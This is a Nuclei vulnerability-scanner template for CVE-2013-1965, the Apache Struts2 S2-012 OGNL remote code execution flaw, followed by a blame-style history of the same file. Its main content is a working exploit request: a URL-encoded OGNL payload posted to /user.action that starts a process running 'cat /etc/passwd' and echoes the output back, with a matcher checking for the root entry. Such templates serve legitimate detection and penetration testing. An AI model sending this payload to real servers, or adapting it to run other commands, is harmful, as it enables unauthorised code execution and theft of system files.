nuclei-templates/cves/2013/CVE-2013-1965.yaml

id: CVE-2013-1965

info:
  name: Apache Struts2 S2-012 RCE
  author: pikpikcu
  severity: critical
  description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
  reference: http://struts.apache.org/development/2.x/docs/s2-012.html
  tags: cve,cve2013,apache,rce,struts

requests:
  - method: POST
    path:
      - "{{BaseURL}}/user.action"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
Create CVE-2013-1965.yaml 2021-02-22 12:28:11 +00:00			`id: CVE-2013-1965`

			`info:`
			`name: Apache Struts2 S2-012 RCE`
			`author: pikpikcu`
			`severity: critical`
Description and references 2021-04-22 09:02:19 +00:00			`description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.`
			`reference: http://struts.apache.org/development/2.x/docs/s2-012.html`
few changes 2021-02-22 18:17:58 +00:00			`tags: cve,cve2013,apache,rce,struts`
Create CVE-2013-1965.yaml 2021-02-22 12:28:11 +00:00
			`requests:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/user.action"`
			`headers:`
few changes 2021-02-22 18:17:58 +00:00			`Content-Type: application/x-www-form-urlencoded`
Create CVE-2013-1965.yaml 2021-02-22 12:28:11 +00:00			`body: \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
Create CVE-2013-1965.yaml 2021-02-22 12:28:11 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0"`
Create CVE-2013-1965.yaml 2021-02-22 12:28:11 +00:00
			`- type: status`
			`status:`
			`- 200`